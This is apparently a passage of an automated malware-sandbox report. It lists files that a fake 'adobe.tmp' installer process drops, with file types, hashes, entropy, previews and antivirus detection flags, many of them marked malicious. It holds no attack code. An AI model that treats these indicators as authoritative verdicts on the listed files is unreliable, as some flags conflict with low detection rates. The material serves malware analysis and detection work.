                                                                                                                                                        • Filename: DDW1MYBYgo.exe, Detection: malicious
                                                                                                                                                        • Filename: XA8GMaaL52.exe, Detection: malicious
                                                                                                                                                        • Filename: DqhHo6K94H.exe, Detection: malicious
                                                                                                                                                        • Filename: scruurP1Ht.exe, Detection: malicious
                                                                                                                                                        • Filename: hMfGY6bjrA.exe, Detection: malicious
                                                                                                                                                        • Filename: Y1qP3rL3j7.exe, Detection: malicious
                                                                                                                                                        • Filename: 9u7RHI3bGw.exe, Detection: malicious
                                                                                                                                                        • Filename: j2po8ek0US.exe, Detection: malicious
                                                                                                                                                        • Filename: dG5B3oQKV8.exe, Detection: malicious
                                                                                                                                                        • Filename: E6Bljk3z1F.exe, Detection: malicious
                                                                                                                                                        • Filename: bGP2DebTbT.exe, Detection: malicious
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):26526
                                                                                                                                                        Entropy (8bit):4.600837395607617
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                                                                                        MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                                                                                        SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                                                                                        SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                                                                                        SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):214016
                                                                                                                                                        Entropy (8bit):6.676457645865373
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                                                                                        MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                                                                                        SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                                                                                        SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                                                                                        SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34392
                                                                                                                                                        Entropy (8bit):7.81689943223162
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                                                                                                        MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                                                                                                        SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                                                                                                        SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                                                                                                        SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5960
                                                                                                                                                        Entropy (8bit):5.956401374574174
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                                                                                                        MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                                                                                                        SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                                                                                                        SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                                                                                                        SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        • Antivirus: Virustotal, Detection: 1%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7910
Entropy (8bit):6.931925007191986
Encrypted:false
SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:1268DEA570A7511FDC8E70C1149F6743
SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 1%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18966
Entropy (8bit):7.620111275837424
Encrypted:false
SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:F0F973781B6A66ADF354B04A36C5E944
SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
• Antivirus: Virustotal, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):36752
Entropy (8bit):7.780431937344781
Encrypted:false
SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:9FF783BB73F8868FA6599CDE65ED21D7
SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):36416
Entropy (8bit):7.842278356440954
Encrypted:false
SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
MD5:BEBA64522AA8265751187E38D1FC0653
SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19008
Entropy (8bit):7.672481244971812
Encrypted:false
SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):68876
Entropy (8bit):7.922125376804506
Encrypted:false
SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
MD5:4E35BA785CD3B37A3702E577510F39E3
SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
• Antivirus: Virustotal, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17472
Entropy (8bit):7.524548435291935
Encrypted:false
SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:7B52BE6D702AA590DB57A0E135F81C45
SHA1:518FB84C77E547DD73C335D2090A35537111F837
SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):35588
Entropy (8bit):7.817557274117395
Encrypted:false
SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:58521D1AC2C588B85642354F6C0C7812
SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
• Antivirus: Virustotal, Detection: 0%

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:Unicode text, UTF-8 text
Category:dropped
Size (bytes):1059
Entropy (8bit):5.1208137218866945
Encrypted:false
SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:false
Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16910
                                                                                                                                                        Entropy (8bit):5.289608933932413
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                                                                                        MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                                                                                        SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                                                                                        SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                                                                                        SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                         • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.192037544202194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                                                                                        MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                                                                                        SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                                                                                        SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                                                                                        SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                         • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):197646
                                                                                                                                                        Entropy (8bit):6.1570532273946625
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                                                                                        MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                                                                                        SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                                                                                        SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                                                                                        SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                         • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31936
                                                                                                                                                        Entropy (8bit):6.6461204214578
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                                                                                        MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                                                                                        SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                                                                                        SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                                                                                        SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                         • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):197120
                                                                                                                                                        Entropy (8bit):6.423554884287906
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                                                                                        MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                                                                                        SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                                                                                        SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                                                                                        SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                         • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):115712
                                                                                                                                                        Entropy (8bit):6.401537154757194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                                                                                        MD5:840D631DA54C308B23590AD6366EBA77
                                                                                                                                                        SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                                                                                        SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                                                                                        SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                                                                                        Malicious:true
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):62478
                                                                                                                                                        Entropy (8bit):6.063363187934607
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                                                                                        MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                                                                                        SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                                                                                        SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                                                                                        SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):26126
Entropy (8bit):6.048294343792499
Encrypted:false
SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:Unicode text, UTF-8 text
Category:dropped
Size (bytes):1059
Entropy (8bit):5.1208137218866945
Encrypted:false
SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:false
Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):772608
Entropy (8bit):6.546391052615969
Encrypted:false
SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:B3B487FC3832B607A853211E8AC42CAD
SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:true
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):62478
Entropy (8bit):6.063363187934607
Encrypted:false
SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):512014
Entropy (8bit):6.566561154468342
Encrypted:false
SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
MD5:C4A2068C59597175CD1A29F3E7F31BC1
SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
Malicious:true
